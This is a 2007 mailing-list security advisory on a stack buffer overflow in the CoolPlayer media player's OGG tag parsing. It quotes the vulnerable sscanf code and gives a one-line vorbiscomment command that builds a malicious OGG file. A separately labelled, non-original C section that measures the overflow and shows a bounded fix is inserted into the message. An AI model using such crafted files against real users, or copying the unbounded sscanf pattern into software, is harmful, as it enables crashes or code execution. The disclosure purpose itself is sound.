
| Subject: | [Full-disclosure] Buffer-overflow in CoolPlayer 217 |
|---|---|
| Date: | Fri, 28 Dec 2007 19:17:13 +0100 |
#######################################################################
Luigi Auriemma
Application: CoolPlayer
http://coolplayer.sourceforge.net
Versions: <= 217
Platforms: Windows
Bug: buffer-overflow in CPLI_ReadTag_OGG
Exploitation: local
Date: 28 Dec 2007
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
CoolPlayer is a tiny open source media player for Windows.
#######################################################################
======
2) Bug
======
The tags in OGG Vorbis files are handled by the CPLI_ReadTag_OGG
function, which uses sscanf to store each tag's name and value in
two stack buffers; the lack of maximum field widths in the format
string results in a buffer-overflow.
From CPI_PlaylistItem.c:
void CPLI_ReadTag_OGG(CPs_PlaylistItem* pItem)
    ...
    char cTag[128];
    char cValue[2048];
    if(sscanf(pComment->user_comments[iCommentIDX], " %[^= ] = %[^=]",
              cTag, cValue) == 2)
    ...
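The following is an added example, not CoolPlayer's code or the author's: it measures, without writing to any buffer, how much the unbounded " %[^= ] = %[^=]" format would copy into cTag[128]/cValue[2048] for a given comment, and shows a hardened form of the same sscanf call whose field widths are derived from the destination sizes. The function names and the constructed sample comment are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Buffer sizes from the CoolPlayer snippet above: cTag[128], cValue[2048]. */
#define TAG_SZ   128
#define VALUE_SZ 2048

/* Measures, without writing into any buffer, how many bytes the original
 * unbounded format " %[^= ] = %[^=]" would copy into cTag and cValue for a
 * given user comment: %* suppresses assignment and %n records offsets.
 * Returns 1 if either destination would be overrun, 0 if both fit,
 * -1 if the comment does not match the "tag = value" shape at all. */
int would_overflow_unbounded(const char *comment, int *tag_len, int *value_len)
{
    int t0 = -1, t1 = -1, v0 = -1, v1 = -1;
    sscanf(comment, " %n%*[^= ]%n = %n%*[^=]%n", &t0, &t1, &v0, &v1);
    if (t1 < 0 || v1 < 0)
        return -1;                      /* a field failed to match */
    *tag_len = t1 - t0;
    *value_len = v1 - v0;
    /* each field also needs one byte for the terminating NUL */
    return (*tag_len >= TAG_SZ || *value_len >= VALUE_SZ) ? 1 : 0;
}

/* Hardened form of the sscanf call (hypothetical, not CoolPlayer's fix):
 * maximum field widths are derived from the destination sizes minus the
 * NUL, so sscanf cannot overrun them.  Returns 1 when both fields parsed. */
int parse_tag_bounded(const char *comment, char *tag, size_t tag_sz,
                      char *value, size_t value_sz)
{
    char fmt[48];   /* becomes " %127[^= ] = %2047[^=]" for the sizes above */
    snprintf(fmt, sizeof fmt, " %%%zu[^= ] = %%%zu[^=]", tag_sz - 1, value_sz - 1);
    tag[0] = value[0] = '\0';
    return sscanf(comment, fmt, tag, value) == 2;
}

/* Runs the hardened parser with the original stack layout and reports the
 * stored value length, or -1 if the comment was rejected. */
int bounded_value_len(const char *comment)
{
    char cTag[TAG_SZ], cValue[VALUE_SZ];
    if (!parse_tag_bounded(comment, cTag, sizeof cTag, cValue, sizeof cValue))
        return -1;
    return (int)strlen(cValue);
}

/* Constructed sample shaped like the advisory's PoC: tag "cTag" followed by
 * 2500 'A's, which exceeds cValue[2048]. */
const char *poc_style_comment(void)
{
    static char buf[5 + 2500 + 1];
    memcpy(buf, "cTag=", 5);
    memset(buf + 5, 'A', 2500);
    buf[sizeof buf - 1] = '\0';
    return buf;
}
```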
#######################################################################
===========
3) The Code
===========
vorbiscomment -t cTag=AAA_2500_A's_AAA -a input.ogg output.ogg
#######################################################################
======
4) Fix
======
The problem has been reported to the developers, who have said that
they will work on this and on any other old public bug.
#######################################################################
---
Luigi Auriemma
http://aluigi.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/